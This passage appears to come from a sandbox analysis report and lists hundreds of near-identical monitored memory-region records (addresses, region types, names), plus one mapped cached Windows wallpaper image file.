0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4564 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4565 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4566 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4567 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4568 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4569 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4570 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4571 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4572 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4573 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4574 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4575 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4576 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4577 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4578 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4579 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4580 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4581 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4582 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4583 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4584 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4585 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4586 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4587 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4588 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4589 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4590 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4591 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 4592 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 4593 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4594 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4595 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4596 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4597 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4598 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4599 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4608 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4609 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4610 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4611 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4612 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4613 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4614 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4615 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4616 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4617 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4618 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4619 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4620 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4621 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4622 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4623 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4624 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4625 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4626 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4627 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4628 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4629 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4630 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4631 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4632 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4633 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4634 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4635 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4636 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4637 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4638 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4639 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4640 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4641 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4642 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4643 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4644 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4645 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4646 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4647 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4648 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4649 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4650 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4651 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4652 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4653 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4654 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4655 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4656 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4657 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4658 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4659 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4660 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4661 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4662 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4663 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4664 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4665 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4666 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4667 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4668 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4669 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4670 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4671 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4672 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4673 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4674 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4675 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4676 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4677 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4678 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4679 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4680 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4681 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4682 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4683 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4684 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4685 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4686 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4687 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4688 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4689 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4690 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4691 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4692 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4693 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4694 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4695 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4696 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4697 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4698 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4699 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4700 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4701 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4702 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4703 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4704 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4705 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4706 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4707 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4708 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4709 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4710 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4711 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4712 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4713 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4714 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4715 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4716 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4717 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4718 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4719 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4720 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4721 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4722 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4723 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4724 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4725 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4726 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4727 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4728 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4729 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4730 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4731 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4732 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4733 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4734 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4735 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4736 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4737 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4738 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4739 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4740 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4741 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4742 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4743 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4744 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4745 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4746 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4747 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4748 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4749 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4750 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4751 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4752 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4753 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4754 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4755 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4756 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4757 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4758 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4759 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4760 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4764 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4765 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4766 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4767 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4768 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4769 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4770 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4771 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 